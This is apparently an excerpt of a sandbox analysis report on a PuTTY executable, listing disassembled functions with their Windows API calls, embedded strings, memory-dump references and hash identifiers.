                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32 ref: 00007FF678604C10
                      • GetLastError.KERNEL32 ref: 00007FF678604C9A
                        • Part of subcall function 00007FF678604E40: GetCommState.KERNEL32 ref: 00007FF678604E69
                        • Part of subcall function 00007FF678649480: CreateEventA.KERNEL32 ref: 00007FF6786494D4
                        • Part of subcall function 00007FF678649480: InitializeCriticalSection.KERNEL32 ref: 00007FF678649534
                        • Part of subcall function 00007FF678649480: CreateEventA.KERNEL32 ref: 00007FF678649544
                        • Part of subcall function 00007FF678649480: CreateThread.KERNEL32 ref: 00007FF678649583
                        • Part of subcall function 00007FF678649480: CloseHandle.KERNEL32 ref: 00007FF678649591
                        • Part of subcall function 00007FF678649120: CreateEventA.KERNEL32 ref: 00007FF678649174
                        • Part of subcall function 00007FF678649120: InitializeCriticalSection.KERNEL32 ref: 00007FF6786491BD
                        • Part of subcall function 00007FF678649120: CreateEventA.KERNEL32 ref: 00007FF6786491CD
                        • Part of subcall function 00007FF678649120: CreateThread.KERNEL32 ref: 00007FF67864920C
                        • Part of subcall function 00007FF678649120: CloseHandle.KERNEL32 ref: 00007FF67864921A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState
                      • String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
                      • API String ID: 2954106191-1737485005
                      • Opcode ID: 8462272af96375a9731e579ad06bba362a2b0478e26546baae626532e76adf5f
                      • Instruction ID: 2d07bb1dde6b478d3e64762d215ee6d7c118cee9678d8ef7215d3fbcbb67ca2f
                      • Opcode Fuzzy Hash: 8462272af96375a9731e579ad06bba362a2b0478e26546baae626532e76adf5f
                      • Instruction Fuzzy Hash: 1841E723E2474251EA109B32E8447AB3B51FB89BE4F604635DE5D87BD6EE3CE9419304
                      Function 00007FF6785F4AB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Window$CapturePlacement$BeepLongMessageRelease
                      • String ID: ,
                      • API String ID: 3018360031-3772416878
                      • Opcode ID: 4c4ee8d28cffcb1e16955972c646d3b16fbee9cf70c6a5ceee3a983bde335b4f
                      • Instruction ID: 62cd9395fdbfe61e33498d17fc5370738d62dbab895a7672c3612da20a8379d2
                      • Opcode Fuzzy Hash: 4c4ee8d28cffcb1e16955972c646d3b16fbee9cf70c6a5ceee3a983bde335b4f
                      • Instruction Fuzzy Hash: 8841F723E2C15256FBA49735A418B7A6EC1AFA1B80F344031DA4D836C6CF6CAD81DE09
                      Function 00007FF67867B120 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66synchronizationCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait
                      • String ID: CreateMutex("%s") failed: %s
                      • API String ID: 1132015839-2623464464
                      • Opcode ID: bbeb3b4ab6db268fd85c93e9a9ab5333092b447f88002d561e7431a4a6f20bc1
                      • Instruction ID: da91bc11f751f4d9cd0e72c1512122763d06d919622ca5318c0b340d25289399
                      • Opcode Fuzzy Hash: bbeb3b4ab6db268fd85c93e9a9ab5333092b447f88002d561e7431a4a6f20bc1
                      • Instruction Fuzzy Hash: B9212623A2D78191EA508B31A44437B6BA1EF95B90F340134EE8D83795DF3CDD459748
                      Function 00007FF6786A3098 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30A7
                      • FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30BC
                      • FlsSetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30DD
                      • FlsSetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A310A
                      • FlsSetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A311B
                      • FlsSetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A312C
                      • SetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A3147
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Value$ErrorLast
                      • String ID:
                      • API String ID: 2506987500-0
                      • Opcode ID: be20319644ee280c18fa1c14b1b7ef3fa13c16217240b713059bc59993cee69d
                      • Instruction ID: 385fb80e3faac4e44c7f5af22014b456e20ef273b4864387345a08280815e53a
                      • Opcode Fuzzy Hash: be20319644ee280c18fa1c14b1b7ef3fa13c16217240b713059bc59993cee69d
                      • Instruction Fuzzy Hash: 9D21B022B2C22222F65463705B8207B6A828F447B0F300634D93ED7BC6EE2CEC01670A
                      Function 00007FF6786B7B5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                      • String ID: CONOUT$
                      • API String ID: 3230265001-3130406586
                      • Opcode ID: dbc9a16b5eeee48a6ee48bd4ee0368ae37068463da30654803f503f6f6d7a1e9
                      • Instruction ID: 11d1d29fe767b8cd88b83b4904deede35d5c9e931e935ed0605351ddf9d10bed
                      • Opcode Fuzzy Hash: dbc9a16b5eeee48a6ee48bd4ee0368ae37068463da30654803f503f6f6d7a1e9
                      • Instruction Fuzzy Hash: E1119632728B4196E3508B26F8443267BA1FB58BE4F600234EA1DC7794CF7CDD148B48
                      Function 00007FF6785D8260 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ObjectPaletteReleaseSelectStock
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$wgs.term_hwnd$wintw_hdc
                      • API String ID: 3714893027-3486798234
                      • Opcode ID: 9bb73d81192733acc6fea9fdd995e3dbd9e5e04040e086bf5101fc3356dcf9c0
                      • Instruction ID: 530b92f571565e0b904c23a367ad40317c7cc063663a617262d7f96f78ccf7c3
                      • Opcode Fuzzy Hash: 9bb73d81192733acc6fea9fdd995e3dbd9e5e04040e086bf5101fc3356dcf9c0
                      • Instruction Fuzzy Hash: 98015216E3C923A1FA509B76EC487722B51BF64B91F714035CC0DC66E49E2CED49EB08
                      Function 00007FF67869C218 Relevance: 9.4, APIs: 6, Instructions: 415COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3215553584-0
                      • Opcode ID: bd737a2eeb7fa6a4c21db5890d005f92dde7c3970c0139e1f6a19456b06c67e1
                      • Instruction ID: b141a357b49fd60ec50b0428696d9505e373a09eadcf6062ee02449b3c00d361
                      • Opcode Fuzzy Hash: bd737a2eeb7fa6a4c21db5890d005f92dde7c3970c0139e1f6a19456b06c67e1
                      • Instruction Fuzzy Hash: 01F1E933A2D696A9F7518F35855027E3F95AB51BA0F649039C78CC73C1CE2CEC65AB08
                      Function 00007FF6785EDDC0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 474timeCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: BlinkCaretTime_set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$col >= 0 && col < line->cols$term->wrap$x > 0
                      • API String ID: 194089122-3097067695
                      • Opcode ID: 35dd72f10746de7798588f7908d4c8cb98d09942c4acdf97e757d8d036e6503f
                      • Instruction ID: a926659e17a1d7c3ed087b8896a477039f09b3d5f17fffc778affca813789be7
                      • Opcode Fuzzy Hash: 35dd72f10746de7798588f7908d4c8cb98d09942c4acdf97e757d8d036e6503f
                      • Instruction Fuzzy Hash: 40228F73A286868BFB688B35D844BAA7B60EB41744F144235CB5E87781DF3CF985C704
                      Function 00007FF6785D8090 Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Char$ObjectSelectWidthWidth32
                      • String ID:
                      • API String ID: 4136774150-0
                      • Opcode ID: c725a2898587075f43e1dc2d463796dcb35102116dd02835240eaa5493979230
                      • Instruction ID: 786319740c3e46cc29332716b9fa51192e559025c3fb49c79cd826b8c12a1256
                      • Opcode Fuzzy Hash: c725a2898587075f43e1dc2d463796dcb35102116dd02835240eaa5493979230
                      • Instruction Fuzzy Hash: 17417327E3881691FA608B79E8C427A6B91BFA8755F740532DC0DC33A4DE2CED459B18
                      Function 00007FF6786A3210 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A321F
                      • FlsSetValue.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A3255
                      • FlsSetValue.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A3282
                      • FlsSetValue.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A3293
                      • FlsSetValue.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A32A4
                      • SetLastError.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A32BF
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Value$ErrorLast
                      • String ID:
                      • API String ID: 2506987500-0
                      • Opcode ID: 1148fc4c0d35bbd3a571b67db096fae2734cc6304b1922bc55f22b24f00a6c59
                      • Instruction ID: 03ddcd39222320b372589603face8c1cf1daa5df5e791802f205679f4271d615
                      • Opcode Fuzzy Hash: 1148fc4c0d35bbd3a571b67db096fae2734cc6304b1922bc55f22b24f00a6c59
                      • Instruction Fuzzy Hash: 57118122E2C26262F954A7715B4707B5A429F457B0F300335D93ED6BC6DE2CEC01670A
                      Function 00007FF6786ACB84 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305fileCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: FileWrite$ConsoleErrorLastOutput
                      • String ID: MZx
                      • API String ID: 2718003287-2575928145
                      • Opcode ID: 84bb804351b2715cd8c68702ce643e48e67f41c0ca54e1dbf60fe47e9234377e
                      • Instruction ID: 45b44c4d59df35fb1ea0f409c81112eedc422e232eff3dc845752b35306a1f24
                      • Opcode Fuzzy Hash: 84bb804351b2715cd8c68702ce643e48e67f41c0ca54e1dbf60fe47e9234377e
                      • Instruction Fuzzy Hash: C8D10233B28A9199E710CF79D4402AD3BB1FB45BA8B204236DE4DD7B99DE38D816D704
                      Function 00007FF678619170 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195COMMON
                      Download Yara Rule
                      APIs
                      • GetCPInfo.KERNEL32(FFFFFFFE,00000000,0000022102FA6D50,?,00000000,00000000,00000000,?,00007FF678617CA2), ref: 00007FF6786192A5
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Info
                      • String ID: UTF-8
                      • API String ID: 1807457897-243350608
                      • Opcode ID: 31daed4d13549b50bec842ae628bc01fa7fd1093a734074d9845411709ca4802
                      • Instruction ID: ddf64852ec94488dc76df73def4be670e5928ee4ae37abd73fd1ba08aee267d9
                      • Opcode Fuzzy Hash: 31daed4d13549b50bec842ae628bc01fa7fd1093a734074d9845411709ca4802
                      • Instruction Fuzzy Hash: CE711223E2C19261FA645734549427F6EA26F41764FB80235DD9EC72E7EE2CEC42A208
                      Function 00007FF6786A8CFC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF6786A3098: GetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30A7
                        • Part of subcall function 00007FF6786A3098: FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30BC
                        • Part of subcall function 00007FF6786A3098: SetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A3147
                      • TranslateName.LIBCMT ref: 00007FF6786A8D69
                      • TranslateName.LIBCMT ref: 00007FF6786A8DA4
                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF678698900), ref: 00007FF6786A8DE9
                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF678698900), ref: 00007FF6786A8E11
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorLastNameTranslate$CodePageValidValue
                      • String ID: utf8
                      • API String ID: 1791977518-905460609
                      • Opcode ID: 147aec7f4f243be30fdf1adca31b102f843554426d767e7d2694068b4c2702b6
                      • Instruction ID: 32827dae2ac7f0bcd3c2a467075b10913f3c8b73002fac55358bdd87323e16dd
                      • Opcode Fuzzy Hash: 147aec7f4f243be30fdf1adca31b102f843554426d767e7d2694068b4c2702b6
                      • Instruction Fuzzy Hash: 56518323A28763A1EB64AB3194005BB2BA5AF54F80F644131DE4C877C5EF7DED51E30A
                      Function 00007FF6786B69FC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _get_daylight.LIBCMT ref: 00007FF6786B6A2A
                        • Part of subcall function 00007FF6786B68B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6786B68C8
                      • _get_daylight.LIBCMT ref: 00007FF6786B6A4C
                        • Part of subcall function 00007FF6786B6884: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6786B6898
                        • Part of subcall function 00007FF6786A44E4: HeapFree.KERNEL32(?,?,?,00007FF6786A8382,?,?,?,00007FF6786A7F43,?,?,00000000,00007FF6786A8C14,?,?,?,00007FF6786A8B1F), ref: 00007FF6786A44FA
                        • Part of subcall function 00007FF6786A44E4: GetLastError.KERNEL32(?,?,?,00007FF6786A8382,?,?,?,00007FF6786A7F43,?,?,00000000,00007FF6786A8C14,?,?,?,00007FF6786A8B1F), ref: 00007FF6786A4504
                      • GetTimeZoneInformation.KERNEL32(?,?,00000000,00000000,?,00007FF6786B6F58), ref: 00007FF6786B6A73
                      • _get_daylight.LIBCMT ref: 00007FF6786B6A3B
                        • Part of subcall function 00007FF6786B6854: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6786B6868
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
